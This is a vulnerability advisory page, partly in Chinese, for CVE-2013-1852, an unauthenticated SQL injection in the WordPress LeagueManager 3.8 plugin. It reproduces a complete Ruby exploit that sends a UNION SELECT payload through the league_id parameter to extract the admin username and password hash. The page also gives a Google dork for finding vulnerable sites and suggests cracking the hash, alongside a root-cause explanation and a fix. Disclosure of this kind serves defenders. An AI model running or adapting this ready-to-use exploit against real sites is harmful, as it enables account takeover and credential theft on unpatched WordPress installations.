WordPress LeagueManager 3.8
BUGTRAQ ID: 58503 CVE(CAN) ID: CVE-2013-1852 WordPress LeagueManager是管理和显示Sports Leagues的插件。 LeagueManager 3.8及其他版本在leaguemanager_export页面内的'league_id'参数的实现上存在SQL注入漏洞,利用此漏洞可允许攻击者执行未授权数据库操作。
- #!/usr/bin/ruby
- #
- # Exploit Title: WordPress LeagueManager Plugin v3.8 SQL Injection
- # Google Dork: inurl:"/wp-content/plugins/leaguemanager/"
- # Date: 13/03/13
- # Exploit Author: Joshua Reynolds
- # Vendor Homepage: http://wordpress.org/extend/plugins/leaguemanager/
- # Software Link: http://downloads.wordpress.org/plugin/leaguemanager.3.8.zip
- # Version: 3.8
- # Tested on: BT5R1 - Ubuntu 10.04.2 LTS
- # CVE: CVE-2013-1852
- #-----------------------------------------------------------------------------------------
- #Description:
- #
- #An SQL Injection vulnerability exists in the league_id parameter of a function call made
- #by the leaguemanager_export page. This request is processed within the leaguemanager.php:
- #
- #if ( isset($_POST['leaguemanager_export']))
- # $lmLoader->adminPanel->export($_POST['league_id'], $_POST['mode']);
- #
- #Which does not sanitize of SQL injection, and is passed to the admin/admin.php page
- #into the export( $league_id, $mode ) function which also does not sanitize for SQL injection
- #when making this call: $this->league = $leaguemanager->getLeague($league_id);
- #The information is then echoed to a CSV file that is then provided.
- #
- #Since no authentication is required when making a POST request to this page,
- #i.e /wp-admin/admin.php?page=leaguemanager-export the request can be made with no established
- #session.
- #
- #Fix:
- #
- #A possible fix for this would be to cast the league_id to an integer during any
- #of the function calls. The following changes can be made in the leaguemanager.php file:
- #$lmLoader->adminPanel->export((int)$_POST['league_id'], $_POST['mode']);
- #
- #These functions should also not be available to public requests, and thus session handling
- #should also be checked prior to the requests being processed within the admin section.
- #
- #The responsible disclosure processes were distorted by the fact that the author no longer
- #supports his well established plugin, and there are currently no maintainers. After
- #e-mailing the folks over at plugins@wordpress.org they've decided to discontinue the plugin
- #and not patch the vulnerability.
- #
- #The following ruby exploit will retrieve the administrator username and the salted
- #password hash from a given site with the plugin installed:
- #------------------------------------------------------------------------------------------
- #Exploit:
- require'net/http'
- require'uri'
- if ARGV.length ==2
- post_params ={
- 'league_id'=>'7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,'\
- '9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--',
- 'mode'=>'teams',
- 'leaguemanager_export'=>'Download+File'
- }
- target_url = ARGV[0]+ ARGV[1]+"/wp-admin/admin.php?page=leaguemanager-export"
- begin
- resp =Net::HTTP.post_form(URI.parse(target_url), post_params)
- rescue
- puts "Invalid URL..."
- end
- if resp.nil?
- print_error "No response received..."
- elsif resp.code !="200"
- puts "Page doesn't exist!"
- else
- admin_login = resp.body.scan(/21\t(.*)\t2.*0\t(.*)\t15/)
- if(admin_login.length >0)
- puts "Username: #{admin_login[0][0]}"
- puts "Hash: #{admin_login[0][1]}"
- puts "\nNow go crack that with Hashcat :)"
- else
- puts "Username and hash not received. Maybe it's patched?"
- end
- end
- else
- puts "Usage: ruby LeagueManagerSQLI.rb \"http://example.com\" \"/wordpress\""
- end
- #Shout outs: Graycon Group Security Team, Red Hat Security Team, Miss Umer, Tim Williams, Dr. Wu, friends & family.
- #
- #Contact:
- #Mail: infosec4breakfast@gmail.com
- #Blog: infosec4breakfast.com
- #Twitter: @jershmagersh
- #Youtube: youtube.com/user/infosec4breakfast
厂商补丁: WordPress --------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://wordpress.org/extend/plugins/leaguemanager/